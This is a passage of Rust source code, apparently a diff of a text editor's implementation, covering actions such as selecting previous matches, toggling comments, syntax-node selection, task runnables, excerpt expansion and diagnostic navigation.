self.push_to_selection_history(); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let buffer = &display_map.buffer_snapshot; - let mut selections = self.selections.all::(cx); - if let Some(mut select_prev_state) = self.select_prev_state.take() { - let query = &select_prev_state.query; - if !select_prev_state.done { - let first_selection = selections.iter().min_by_key(|s| s.id).unwrap(); - let last_selection = selections.iter().max_by_key(|s| s.id).unwrap(); - let mut next_selected_range = None; - // When we're iterating matches backwards, the oldest match will actually be the furthest one in the buffer. - let bytes_before_last_selection = - buffer.reversed_bytes_in_range(0..last_selection.start); - let bytes_after_first_selection = - buffer.reversed_bytes_in_range(first_selection.end..buffer.len()); - let query_matches = query - .stream_find_iter(bytes_before_last_selection) - .map(|result| (last_selection.start, result)) - .chain( - query - .stream_find_iter(bytes_after_first_selection) - .map(|result| (buffer.len(), result)), - ); - for (end_offset, query_match) in query_matches { - let query_match = query_match.unwrap(); // can only fail due to I/O - let offset_range = - end_offset - query_match.end()..end_offset - query_match.start(); - let display_range = offset_range.start.to_display_point(&display_map) - ..offset_range.end.to_display_point(&display_map); - - if !select_prev_state.wordwise - || (!movement::is_inside_word(&display_map, display_range.start) - && !movement::is_inside_word(&display_map, display_range.end)) - { - next_selected_range = Some(offset_range); - break; - } - } - - if let Some(next_selected_range) = next_selected_range { - self.unfold_ranges(&[next_selected_range.clone()], false, true, cx); - self.change_selections(Some(Autoscroll::newest()), window, cx, |s| { - if action.replace_newest { - s.delete(s.newest_anchor().id); - } - if last_selection.reversed { - s.insert_range(next_selected_range.end..next_selected_range.start); - } else { - s.insert_range(next_selected_range); - } - }); - } else { - select_prev_state.done = true; - } - } - - self.select_prev_state = Some(select_prev_state); - } else { - let mut only_carets = true; - let mut same_text_selected = true; - let mut selected_text = None; - - let mut selections_iter = selections.iter().peekable(); - while let Some(selection) = selections_iter.next() { - if selection.start != selection.end { - only_carets = false; - } - - if same_text_selected { - if selected_text.is_none() { - selected_text = - Some(buffer.text_for_range(selection.range()).collect::()); - } - - if let Some(next_selection) = selections_iter.peek() { - if next_selection.range().len() == selection.range().len() { - let next_selected_text = buffer - .text_for_range(next_selection.range()) - .collect::(); - if Some(next_selected_text) != selected_text { - same_text_selected = false; - selected_text = None; - } - } else { - same_text_selected = false; - selected_text = None; - } - } - } - } - - if only_carets { - for selection in &mut selections { - let word_range = movement::surrounding_word( - &display_map, - selection.start.to_display_point(&display_map), - ); - selection.start = word_range.start.to_offset(&display_map, Bias::Left); - selection.end = word_range.end.to_offset(&display_map, Bias::Left); - selection.goal = SelectionGoal::None; - selection.reversed = false; - } - if selections.len() == 1 { - let selection = selections - .last() - .expect("ensured that there's only one selection"); - let query = buffer - .text_for_range(selection.start..selection.end) - .collect::(); - let is_empty = query.is_empty(); - let select_state = SelectNextState { - query: AhoCorasick::new(&[query.chars().rev().collect::()])?, - wordwise: true, - done: is_empty, - }; - self.select_prev_state = Some(select_state); - } else { - self.select_prev_state = None; - } - - self.unfold_ranges( - &selections.iter().map(|s| s.range()).collect::>(), - false, - true, - cx, - ); - self.change_selections(Some(Autoscroll::newest()), window, cx, |s| { - s.select(selections); - }); - } else if let Some(selected_text) = selected_text { - self.select_prev_state = Some(SelectNextState { - query: AhoCorasick::new(&[selected_text.chars().rev().collect::()])?, - wordwise: false, - done: false, - }); - self.select_previous(action, window, cx)?; - } - } - Ok(()) - } - - pub fn find_next_match( - &mut self, - _: &FindNextMatch, - window: &mut Window, - cx: &mut Context, - ) -> Result<()> { - let selections = self.selections.disjoint_anchors(); - match selections.first() { - Some(first) if selections.len() >= 2 => { - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_ranges([first.range()]); - }); - } - _ => self.select_next( - &SelectNext { - replace_newest: true, - }, - window, - cx, - )?, - } - Ok(()) - } - - pub fn find_previous_match( - &mut self, - _: &FindPreviousMatch, - window: &mut Window, - cx: &mut Context, - ) -> Result<()> { - let selections = self.selections.disjoint_anchors(); - match selections.last() { - Some(last) if selections.len() >= 2 => { - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_ranges([last.range()]); - }); - } - _ => self.select_previous( - &SelectPrevious { - replace_newest: true, - }, - window, - cx, - )?, - } - Ok(()) - } - - pub fn toggle_comments( - &mut self, - action: &ToggleComments, - window: &mut Window, - cx: &mut Context, - ) { - if self.read_only(cx) { - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let text_layout_details = &self.text_layout_details(window); - self.transact(window, cx, |this, window, cx| { - let mut selections = this.selections.all::(cx); - let mut edits = Vec::new(); - let mut selection_edit_ranges = Vec::new(); - let mut last_toggled_row = None; - let snapshot = this.buffer.read(cx).read(cx); - let empty_str: Arc = Arc::default(); - let mut suffixes_inserted = Vec::new(); - let ignore_indent = action.ignore_indent; - - fn comment_prefix_range( - snapshot: &MultiBufferSnapshot, - row: MultiBufferRow, - comment_prefix: &str, - comment_prefix_whitespace: &str, - ignore_indent: bool, - ) -> Range { - let indent_size = if ignore_indent { - 0 - } else { - snapshot.indent_size_for_line(row).len - }; - - let start = Point::new(row.0, indent_size); - - let mut line_bytes = snapshot - .bytes_in_range(start..snapshot.max_point()) - .flatten() - .copied(); - - // If this line currently begins with the line comment prefix, then record - // the range containing the prefix. - if line_bytes - .by_ref() - .take(comment_prefix.len()) - .eq(comment_prefix.bytes()) - { - // Include any whitespace that matches the comment prefix. - let matching_whitespace_len = line_bytes - .zip(comment_prefix_whitespace.bytes()) - .take_while(|(a, b)| a == b) - .count() as u32; - let end = Point::new( - start.row, - start.column + comment_prefix.len() as u32 + matching_whitespace_len, - ); - start..end - } else { - start..start - } - } - - fn comment_suffix_range( - snapshot: &MultiBufferSnapshot, - row: MultiBufferRow, - comment_suffix: &str, - comment_suffix_has_leading_space: bool, - ) -> Range { - let end = Point::new(row.0, snapshot.line_len(row)); - let suffix_start_column = end.column.saturating_sub(comment_suffix.len() as u32); - - let mut line_end_bytes = snapshot - .bytes_in_range(Point::new(end.row, suffix_start_column.saturating_sub(1))..end) - .flatten() - .copied(); - - let leading_space_len = if suffix_start_column > 0 - && line_end_bytes.next() == Some(b' ') - && comment_suffix_has_leading_space - { - 1 - } else { - 0 - }; - - // If this line currently begins with the line comment prefix, then record - // the range containing the prefix. - if line_end_bytes.by_ref().eq(comment_suffix.bytes()) { - let start = Point::new(end.row, suffix_start_column - leading_space_len); - start..end - } else { - end..end - } - } - - // TODO: Handle selections that cross excerpts - for selection in &mut selections { - let start_column = snapshot - .indent_size_for_line(MultiBufferRow(selection.start.row)) - .len; - let language = if let Some(language) = - snapshot.language_scope_at(Point::new(selection.start.row, start_column)) - { - language - } else { - continue; - }; - - selection_edit_ranges.clear(); - - // If multiple selections contain a given row, avoid processing that - // row more than once. - let mut start_row = MultiBufferRow(selection.start.row); - if last_toggled_row == Some(start_row) { - start_row = start_row.next_row(); - } - let end_row = - if selection.end.row > selection.start.row && selection.end.column == 0 { - MultiBufferRow(selection.end.row - 1) - } else { - MultiBufferRow(selection.end.row) - }; - last_toggled_row = Some(end_row); - - if start_row > end_row { - continue; - } - - // If the language has line comments, toggle those. - let mut full_comment_prefixes = language.line_comment_prefixes().to_vec(); - - // If ignore_indent is set, trim spaces from the right side of all full_comment_prefixes - if ignore_indent { - full_comment_prefixes = full_comment_prefixes - .into_iter() - .map(|s| Arc::from(s.trim_end())) - .collect(); - } - - if !full_comment_prefixes.is_empty() { - let first_prefix = full_comment_prefixes - .first() - .expect("prefixes is non-empty"); - let prefix_trimmed_lengths = full_comment_prefixes - .iter() - .map(|p| p.trim_end_matches(' ').len()) - .collect::>(); - - let mut all_selection_lines_are_comments = true; - - for row in start_row.0..=end_row.0 { - let row = MultiBufferRow(row); - if start_row < end_row && snapshot.is_line_blank(row) { - continue; - } - - let prefix_range = full_comment_prefixes - .iter() - .zip(prefix_trimmed_lengths.iter().copied()) - .map(|(prefix, trimmed_prefix_len)| { - comment_prefix_range( - snapshot.deref(), - row, - &prefix[..trimmed_prefix_len], - &prefix[trimmed_prefix_len..], - ignore_indent, - ) - }) - .max_by_key(|range| range.end.column - range.start.column) - .expect("prefixes is non-empty"); - - if prefix_range.is_empty() { - all_selection_lines_are_comments = false; - } - - selection_edit_ranges.push(prefix_range); - } - - if all_selection_lines_are_comments { - edits.extend( - selection_edit_ranges - .iter() - .cloned() - .map(|range| (range, empty_str.clone())), - ); - } else { - let min_column = selection_edit_ranges - .iter() - .map(|range| range.start.column) - .min() - .unwrap_or(0); - edits.extend(selection_edit_ranges.iter().map(|range| { - let position = Point::new(range.start.row, min_column); - (position..position, first_prefix.clone()) - })); - } - } else if let Some((full_comment_prefix, comment_suffix)) = - language.block_comment_delimiters() - { - let comment_prefix = full_comment_prefix.trim_end_matches(' '); - let comment_prefix_whitespace = &full_comment_prefix[comment_prefix.len()..]; - let prefix_range = comment_prefix_range( - snapshot.deref(), - start_row, - comment_prefix, - comment_prefix_whitespace, - ignore_indent, - ); - let suffix_range = comment_suffix_range( - snapshot.deref(), - end_row, - comment_suffix.trim_start_matches(' '), - comment_suffix.starts_with(' '), - ); - - if prefix_range.is_empty() || suffix_range.is_empty() { - edits.push(( - prefix_range.start..prefix_range.start, - full_comment_prefix.clone(), - )); - edits.push((suffix_range.end..suffix_range.end, comment_suffix.clone())); - suffixes_inserted.push((end_row, comment_suffix.len())); - } else { - edits.push((prefix_range, empty_str.clone())); - edits.push((suffix_range, empty_str.clone())); - } - } else { - continue; - } - } - - drop(snapshot); - this.buffer.update(cx, |buffer, cx| { - buffer.edit(edits, None, cx); - }); - - // Adjust selections so that they end before any comment suffixes that - // were inserted. - let mut suffixes_inserted = suffixes_inserted.into_iter().peekable(); - let mut selections = this.selections.all::(cx); - let snapshot = this.buffer.read(cx).read(cx); - for selection in &mut selections { - while let Some((row, suffix_len)) = suffixes_inserted.peek().copied() { - match row.cmp(&MultiBufferRow(selection.end.row)) { - Ordering::Less => { - suffixes_inserted.next(); - continue; - } - Ordering::Greater => break, - Ordering::Equal => { - if selection.end.column == snapshot.line_len(row) { - if selection.is_empty() { - selection.start.column -= suffix_len as u32; - } - selection.end.column -= suffix_len as u32; - } - break; - } - } - } - } - - drop(snapshot); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(selections) - }); - - let selections = this.selections.all::(cx); - let selections_on_single_row = selections.windows(2).all(|selections| { - selections[0].start.row == selections[1].start.row - && selections[0].end.row == selections[1].end.row - && selections[0].start.row == selections[0].end.row - }); - let selections_selecting = selections - .iter() - .any(|selection| selection.start != selection.end); - let advance_downwards = action.advance_downwards - && selections_on_single_row - && !selections_selecting - && !matches!(this.mode, EditorMode::SingleLine { .. }); - - if advance_downwards { - let snapshot = this.buffer.read(cx).snapshot(cx); - - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_cursors_with(|display_snapshot, display_point, _| { - let mut point = display_point.to_point(display_snapshot); - point.row += 1; - point = snapshot.clip_point(point, Bias::Left); - let display_point = point.to_display_point(display_snapshot); - let goal = SelectionGoal::HorizontalPosition( - display_snapshot - .x_for_display_point(display_point, text_layout_details) - .into(), - ); - (display_point, goal) - }) - }); - } - }); - } - - pub fn select_enclosing_symbol( - &mut self, - _: &SelectEnclosingSymbol, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let buffer = self.buffer.read(cx).snapshot(cx); - let old_selections = self.selections.all::(cx).into_boxed_slice(); - - fn update_selection( - selection: &Selection, - buffer_snap: &MultiBufferSnapshot, - ) -> Option> { - let cursor = selection.head(); - let (_buffer_id, symbols) = buffer_snap.symbols_containing(cursor, None)?; - for symbol in symbols.iter().rev() { - let start = symbol.range.start.to_offset(buffer_snap); - let end = symbol.range.end.to_offset(buffer_snap); - let new_range = start..end; - if start < selection.start || end > selection.end { - return Some(Selection { - id: selection.id, - start: new_range.start, - end: new_range.end, - goal: SelectionGoal::None, - reversed: selection.reversed, - }); - } - } - None - } - - let mut selected_larger_symbol = false; - let new_selections = old_selections - .iter() - .map(|selection| match update_selection(selection, &buffer) { - Some(new_selection) => { - if new_selection.range() != selection.range() { - selected_larger_symbol = true; - } - new_selection - } - None => selection.clone(), - }) - .collect::>(); - - if selected_larger_symbol { - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(new_selections); - }); - } - } - - pub fn select_larger_syntax_node( - &mut self, - _: &SelectLargerSyntaxNode, - window: &mut Window, - cx: &mut Context, - ) { - let Some(visible_row_count) = self.visible_row_count() else { - return; - }; - let old_selections: Box<[_]> = self.selections.all::(cx).into(); - if old_selections.is_empty() { - return; - } - - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let buffer = self.buffer.read(cx).snapshot(cx); - - let mut selected_larger_node = false; - let mut new_selections = old_selections - .iter() - .map(|selection| { - let old_range = selection.start..selection.end; - - if let Some((node, _)) = buffer.syntax_ancestor(old_range.clone()) { - // manually select word at selection - if ["string_content", "inline"].contains(&node.kind()) { - let word_range = { - let display_point = buffer - .offset_to_point(old_range.start) - .to_display_point(&display_map); - let Range { start, end } = - movement::surrounding_word(&display_map, display_point); - start.to_point(&display_map).to_offset(&buffer) - ..end.to_point(&display_map).to_offset(&buffer) - }; - // ignore if word is already selected - if !word_range.is_empty() && old_range != word_range { - let last_word_range = { - let display_point = buffer - .offset_to_point(old_range.end) - .to_display_point(&display_map); - let Range { start, end } = - movement::surrounding_word(&display_map, display_point); - start.to_point(&display_map).to_offset(&buffer) - ..end.to_point(&display_map).to_offset(&buffer) - }; - // only select word if start and end point belongs to same word - if word_range == last_word_range { - selected_larger_node = true; - return Selection { - id: selection.id, - start: word_range.start, - end: word_range.end, - goal: SelectionGoal::None, - reversed: selection.reversed, - }; - } - } - } - } - - let mut new_range = old_range.clone(); - let mut new_node = None; - while let Some((node, containing_range)) = buffer.syntax_ancestor(new_range.clone()) - { - new_node = Some(node); - new_range = match containing_range { - MultiOrSingleBufferOffsetRange::Single(_) => break, - MultiOrSingleBufferOffsetRange::Multi(range) => range, - }; - if !display_map.intersects_fold(new_range.start) - && !display_map.intersects_fold(new_range.end) - { - break; - } - } - - if let Some(node) = new_node { - // Log the ancestor, to support using this action as a way to explore TreeSitter - // nodes. Parent and grandparent are also logged because this operation will not - // visit nodes that have the same range as their parent. - log::info!("Node: {node:?}"); - let parent = node.parent(); - log::info!("Parent: {parent:?}"); - let grandparent = parent.and_then(|x| x.parent()); - log::info!("Grandparent: {grandparent:?}"); - } - - selected_larger_node |= new_range != old_range; - Selection { - id: selection.id, - start: new_range.start, - end: new_range.end, - goal: SelectionGoal::None, - reversed: selection.reversed, - } - }) - .collect::>(); - - if !selected_larger_node { - return; // don't put this call in the history - } - - // scroll based on transformation done to the last selection created by the user - let (last_old, last_new) = old_selections - .last() - .zip(new_selections.last().cloned()) - .expect("old_selections isn't empty"); - - // revert selection - let is_selection_reversed = { - let should_newest_selection_be_reversed = last_old.start != last_new.start; - new_selections.last_mut().expect("checked above").reversed = - should_newest_selection_be_reversed; - should_newest_selection_be_reversed - }; - - if selected_larger_node { - self.select_syntax_node_history.disable_clearing = true; - self.change_selections(None, window, cx, |s| { - s.select(new_selections.clone()); - }); - self.select_syntax_node_history.disable_clearing = false; - } - - let start_row = last_new.start.to_display_point(&display_map).row().0; - let end_row = last_new.end.to_display_point(&display_map).row().0; - let selection_height = end_row - start_row + 1; - let scroll_margin_rows = self.vertical_scroll_margin() as u32; - - let fits_on_the_screen = visible_row_count >= selection_height + scroll_margin_rows * 2; - let scroll_behavior = if fits_on_the_screen { - self.request_autoscroll(Autoscroll::fit(), cx); - SelectSyntaxNodeScrollBehavior::FitSelection - } else if is_selection_reversed { - self.scroll_cursor_top(&ScrollCursorTop, window, cx); - SelectSyntaxNodeScrollBehavior::CursorTop - } else { - self.scroll_cursor_bottom(&ScrollCursorBottom, window, cx); - SelectSyntaxNodeScrollBehavior::CursorBottom - }; - - self.select_syntax_node_history.push(( - old_selections, - scroll_behavior, - is_selection_reversed, - )); - } - - pub fn select_smaller_syntax_node( - &mut self, - _: &SelectSmallerSyntaxNode, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - - if let Some((mut selections, scroll_behavior, is_selection_reversed)) = - self.select_syntax_node_history.pop() - { - if let Some(selection) = selections.last_mut() { - selection.reversed = is_selection_reversed; - } - - self.select_syntax_node_history.disable_clearing = true; - self.change_selections(None, window, cx, |s| { - s.select(selections.to_vec()); - }); - self.select_syntax_node_history.disable_clearing = false; - - match scroll_behavior { - SelectSyntaxNodeScrollBehavior::CursorTop => { - self.scroll_cursor_top(&ScrollCursorTop, window, cx); - } - SelectSyntaxNodeScrollBehavior::FitSelection => { - self.request_autoscroll(Autoscroll::fit(), cx); - } - SelectSyntaxNodeScrollBehavior::CursorBottom => { - self.scroll_cursor_bottom(&ScrollCursorBottom, window, cx); - } - } - } - } - - fn refresh_runnables(&mut self, window: &mut Window, cx: &mut Context) -> Task<()> { - if !EditorSettings::get_global(cx).gutter.runnables { - self.clear_tasks(); - return Task::ready(()); - } - let project = self.project.as_ref().map(Entity::downgrade); - let task_sources = self.lsp_task_sources(cx); - cx.spawn_in(window, async move |editor, cx| { - cx.background_executor().timer(UPDATE_DEBOUNCE).await; - let Some(project) = project.and_then(|p| p.upgrade()) else { - return; - }; - let Ok(display_snapshot) = editor.update(cx, |this, cx| { - this.display_map.update(cx, |map, cx| map.snapshot(cx)) - }) else { - return; - }; - - let hide_runnables = project - .update(cx, |project, cx| { - // Do not display any test indicators in non-dev server remote projects. - project.is_via_collab() && project.ssh_connection_string(cx).is_none() - }) - .unwrap_or(true); - if hide_runnables { - return; - } - let new_rows = - cx.background_spawn({ - let snapshot = display_snapshot.clone(); - async move { - Self::fetch_runnable_ranges(&snapshot, Anchor::min()..Anchor::max()) - } - }) - .await; - let Ok(lsp_tasks) = - cx.update(|_, cx| crate::lsp_tasks(project.clone(), &task_sources, None, cx)) - else { - return; - }; - let lsp_tasks = lsp_tasks.await; - - let Ok(mut lsp_tasks_by_rows) = cx.update(|_, cx| { - lsp_tasks - .into_iter() - .flat_map(|(kind, tasks)| { - tasks.into_iter().filter_map(move |(location, task)| { - Some((kind.clone(), location?, task)) - }) - }) - .fold(HashMap::default(), |mut acc, (kind, location, task)| { - let buffer = location.target.buffer; - let buffer_snapshot = buffer.read(cx).snapshot(); - let offset = display_snapshot.buffer_snapshot.excerpts().find_map( - |(excerpt_id, snapshot, _)| { - if snapshot.remote_id() == buffer_snapshot.remote_id() { - display_snapshot - .buffer_snapshot - .anchor_in_excerpt(excerpt_id, location.target.range.start) - } else { - None - } - }, - ); - if let Some(offset) = offset { - let task_buffer_range = - location.target.range.to_point(&buffer_snapshot); - let context_buffer_range = - task_buffer_range.to_offset(&buffer_snapshot); - let context_range = BufferOffset(context_buffer_range.start) - ..BufferOffset(context_buffer_range.end); - - acc.entry((buffer_snapshot.remote_id(), task_buffer_range.start.row)) - .or_insert_with(|| RunnableTasks { - templates: Vec::new(), - offset, - column: task_buffer_range.start.column, - extra_variables: HashMap::default(), - context_range, - }) - .templates - .push((kind, task.original_task().clone())); - } - - acc - }) - }) else { - return; - }; - - let rows = Self::runnable_rows(project, display_snapshot, new_rows, cx.clone()); - editor - .update(cx, |editor, _| { - editor.clear_tasks(); - for (key, mut value) in rows { - if let Some(lsp_tasks) = lsp_tasks_by_rows.remove(&key) { - value.templates.extend(lsp_tasks.templates); - } - - editor.insert_tasks(key, value); - } - for (key, value) in lsp_tasks_by_rows { - editor.insert_tasks(key, value); - } - }) - .ok(); - }) - } - fn fetch_runnable_ranges( - snapshot: &DisplaySnapshot, - range: Range, - ) -> Vec { - snapshot.buffer_snapshot.runnable_ranges(range).collect() - } - - fn runnable_rows( - project: Entity, - snapshot: DisplaySnapshot, - runnable_ranges: Vec, - mut cx: AsyncWindowContext, - ) -> Vec<((BufferId, BufferRow), RunnableTasks)> { - runnable_ranges - .into_iter() - .filter_map(|mut runnable| { - let tasks = cx - .update(|_, cx| Self::templates_with_tags(&project, &mut runnable.runnable, cx)) - .ok()?; - if tasks.is_empty() { - return None; - } - - let point = runnable.run_range.start.to_point(&snapshot.buffer_snapshot); - - let row = snapshot - .buffer_snapshot - .buffer_line_for_row(MultiBufferRow(point.row))? - .1 - .start - .row; - - let context_range = - BufferOffset(runnable.full_range.start)..BufferOffset(runnable.full_range.end); - Some(( - (runnable.buffer_id, row), - RunnableTasks { - templates: tasks, - offset: snapshot - .buffer_snapshot - .anchor_before(runnable.run_range.start), - context_range, - column: point.column, - extra_variables: runnable.extra_captures, - }, - )) - }) - .collect() - } - - fn templates_with_tags( - project: &Entity, - runnable: &mut Runnable, - cx: &mut App, - ) -> Vec<(TaskSourceKind, TaskTemplate)> { - let (inventory, worktree_id, file) = project.read_with(cx, |project, cx| { - let (worktree_id, file) = project - .buffer_for_id(runnable.buffer, cx) - .and_then(|buffer| buffer.read(cx).file()) - .map(|file| (file.worktree_id(cx), file.clone())) - .unzip(); - - ( - project.task_store().read(cx).task_inventory().cloned(), - worktree_id, - file, - ) - }); - - let mut templates_with_tags = mem::take(&mut runnable.tags) - .into_iter() - .flat_map(|RunnableTag(tag)| { - inventory - .as_ref() - .into_iter() - .flat_map(|inventory| { - inventory.read(cx).list_tasks( - file.clone(), - Some(runnable.language.clone()), - worktree_id, - cx, - ) - }) - .filter(move |(_, template)| { - template.tags.iter().any(|source_tag| source_tag == &tag) - }) - }) - .sorted_by_key(|(kind, _)| kind.to_owned()) - .collect::>(); - if let Some((leading_tag_source, _)) = templates_with_tags.first() { - // Strongest source wins; if we have worktree tag binding, prefer that to - // global and language bindings; - // if we have a global binding, prefer that to language binding. - let first_mismatch = templates_with_tags - .iter() - .position(|(tag_source, _)| tag_source != leading_tag_source); - if let Some(index) = first_mismatch { - templates_with_tags.truncate(index); - } - } - - templates_with_tags - } - - pub fn move_to_enclosing_bracket( - &mut self, - _: &MoveToEnclosingBracket, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_offsets_with(|snapshot, selection| { - let Some(enclosing_bracket_ranges) = - snapshot.enclosing_bracket_ranges(selection.start..selection.end) - else { - return; - }; - - let mut best_length = usize::MAX; - let mut best_inside = false; - let mut best_in_bracket_range = false; - let mut best_destination = None; - for (open, close) in enclosing_bracket_ranges { - let close = close.to_inclusive(); - let length = close.end() - open.start; - let inside = selection.start >= open.end && selection.end <= *close.start(); - let in_bracket_range = open.to_inclusive().contains(&selection.head()) - || close.contains(&selection.head()); - - // If best is next to a bracket and current isn't, skip - if !in_bracket_range && best_in_bracket_range { - continue; - } - - // Prefer smaller lengths unless best is inside and current isn't - if length > best_length && (best_inside || !inside) { - continue; - } - - best_length = length; - best_inside = inside; - best_in_bracket_range = in_bracket_range; - best_destination = Some( - if close.contains(&selection.start) && close.contains(&selection.end) { - if inside { open.end } else { open.start } - } else if inside { - *close.start() - } else { - *close.end() - }, - ); - } - - if let Some(destination) = best_destination { - selection.collapse_to(destination, SelectionGoal::None); - } - }) - }); - } - - pub fn undo_selection( - &mut self, - _: &UndoSelection, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.end_selection(window, cx); - self.selection_history.mode = SelectionHistoryMode::Undoing; - if let Some(entry) = self.selection_history.undo_stack.pop_back() { - self.change_selections(None, window, cx, |s| { - s.select_anchors(entry.selections.to_vec()) - }); - self.select_next_state = entry.select_next_state; - self.select_prev_state = entry.select_prev_state; - self.add_selections_state = entry.add_selections_state; - self.request_autoscroll(Autoscroll::newest(), cx); - } - self.selection_history.mode = SelectionHistoryMode::Normal; - } - - pub fn redo_selection( - &mut self, - _: &RedoSelection, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.end_selection(window, cx); - self.selection_history.mode = SelectionHistoryMode::Redoing; - if let Some(entry) = self.selection_history.redo_stack.pop_back() { - self.change_selections(None, window, cx, |s| { - s.select_anchors(entry.selections.to_vec()) - }); - self.select_next_state = entry.select_next_state; - self.select_prev_state = entry.select_prev_state; - self.add_selections_state = entry.add_selections_state; - self.request_autoscroll(Autoscroll::newest(), cx); - } - self.selection_history.mode = SelectionHistoryMode::Normal; - } - - pub fn expand_excerpts( - &mut self, - action: &ExpandExcerpts, - _: &mut Window, - cx: &mut Context, - ) { - self.expand_excerpts_for_direction(action.lines, ExpandExcerptDirection::UpAndDown, cx) - } - - pub fn expand_excerpts_down( - &mut self, - action: &ExpandExcerptsDown, - _: &mut Window, - cx: &mut Context, - ) { - self.expand_excerpts_for_direction(action.lines, ExpandExcerptDirection::Down, cx) - } - - pub fn expand_excerpts_up( - &mut self, - action: &ExpandExcerptsUp, - _: &mut Window, - cx: &mut Context, - ) { - self.expand_excerpts_for_direction(action.lines, ExpandExcerptDirection::Up, cx) - } - - pub fn expand_excerpts_for_direction( - &mut self, - lines: u32, - direction: ExpandExcerptDirection, - - cx: &mut Context, - ) { - let selections = self.selections.disjoint_anchors(); - - let lines = if lines == 0 { - EditorSettings::get_global(cx).expand_excerpt_lines - } else { - lines - }; - - self.buffer.update(cx, |buffer, cx| { - let snapshot = buffer.snapshot(cx); - let mut excerpt_ids = selections - .iter() - .flat_map(|selection| snapshot.excerpt_ids_for_range(selection.range())) - .collect::>(); - excerpt_ids.sort(); - excerpt_ids.dedup(); - buffer.expand_excerpts(excerpt_ids, lines, direction, cx) - }) - } - - pub fn expand_excerpt( - &mut self, - excerpt: ExcerptId, - direction: ExpandExcerptDirection, - window: &mut Window, - cx: &mut Context, - ) { - let current_scroll_position = self.scroll_position(cx); - let lines_to_expand = EditorSettings::get_global(cx).expand_excerpt_lines; - let mut should_scroll_up = false; - - if direction == ExpandExcerptDirection::Down { - let multi_buffer = self.buffer.read(cx); - let snapshot = multi_buffer.snapshot(cx); - if let Some(buffer_id) = snapshot.buffer_id_for_excerpt(excerpt) { - if let Some(buffer) = multi_buffer.buffer(buffer_id) { - if let Some(excerpt_range) = snapshot.buffer_range_for_excerpt(excerpt) { - let buffer_snapshot = buffer.read(cx).snapshot(); - let excerpt_end_row = - Point::from_anchor(&excerpt_range.end, &buffer_snapshot).row; - let last_row = buffer_snapshot.max_point().row; - let lines_below = last_row.saturating_sub(excerpt_end_row); - should_scroll_up = lines_below >= lines_to_expand; - } - } - } - } - - self.buffer.update(cx, |buffer, cx| { - buffer.expand_excerpts([excerpt], lines_to_expand, direction, cx) - }); - - if should_scroll_up { - let new_scroll_position = - current_scroll_position + gpui::Point::new(0.0, lines_to_expand as f32); - self.set_scroll_position(new_scroll_position, window, cx); - } - } - - pub fn go_to_singleton_buffer_point( - &mut self, - point: Point, - window: &mut Window, - cx: &mut Context, - ) { - self.go_to_singleton_buffer_range(point..point, window, cx); - } - - pub fn go_to_singleton_buffer_range( - &mut self, - range: Range, - window: &mut Window, - cx: &mut Context, - ) { - let multibuffer = self.buffer().read(cx); - let Some(buffer) = multibuffer.as_singleton() else { - return; - }; - let Some(start) = multibuffer.buffer_point_to_anchor(&buffer, range.start, cx) else { - return; - }; - let Some(end) = multibuffer.buffer_point_to_anchor(&buffer, range.end, cx) else { - return; - }; - self.change_selections(Some(Autoscroll::center()), window, cx, |s| { - s.select_anchor_ranges([start..end]) - }); - } - - pub fn go_to_diagnostic( - &mut self, - _: &GoToDiagnostic, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.go_to_diagnostic_impl(Direction::Next, window, cx) - } - - pub fn go_to_prev_diagnostic( - &mut self, - _: &GoToPreviousDiagnostic, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); - self.go_to_diagnostic_impl(Direction::Prev, window, cx) - } - - pub fn go_to_diagnostic_impl( - &mut self, - direction: Direction, - window: &mut Window, - cx: &mut Context, - ) { - let buffer = self.buffer.read(cx).snapshot(cx); - let selection = self.selections.newest::(cx); - - let mut active_group_id = None; - if let ActiveDiagnostic::Group(active_group) = &self.active_diagnostics { - if active_group.active_range.start.to_offset(&buffer) == selection.start { - active_group_id = Some(active_group.group_id); - } - } - - fn filtered( - snapshot: EditorSnapshot, - diagnostics: impl Iterator>, - ) -> impl Iterator> { - diagnostics - .filter(|entry| entry.range.start != entry.range.end) - .filter(|entry| !entry.diagnostic.is_unnecessary) - .filter(move |entry| !snapshot.intersects_fold(entry.range.start)) - } - - let snapshot = self.snapshot(window, cx); - let before = filtered( - snapshot.clone(), - buffer - .diagnostics_in_range(0..selection.start) - .filter(|entry| entry.range.start <= selection.start), - ); - let after = filtered( - snapshot, - buffer - .diagnostics_in_range(selection.start..buffer.len()) - .filter(|entry| entry.range.start >= selection.start), - ); - - let mut found: Option> = None; - if direction == Direction::Prev { - 'outer: for prev_diagnostics in [before.collect::>(), after.collect::>()] - { - for diagnostic in prev_diagnostics.into_iter().rev() { - if diagnostic.range.start != selection.start - || active_group_id - .is_some_and(|active| diagnostic.diagnostic.group_id < active) - { - found = Some(diagnostic); - break 'outer; - } - } - } - } else { - for diagnostic in after.chain(before) { - if diagnostic.range.start != selection.start - || active_group_id.is_some_and(|active| diagnostic.diagnostic.group_id > active) - { - found = Some(diagnostic); - break; - } - } - } - let Some(next_diagnostic) = found else { - return; - }; - - let Some(buffer_id) = buffer.anchor_after(next_diagnostic.range.start).buffer_id else { - return; - }; - self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_ranges(vec![ - 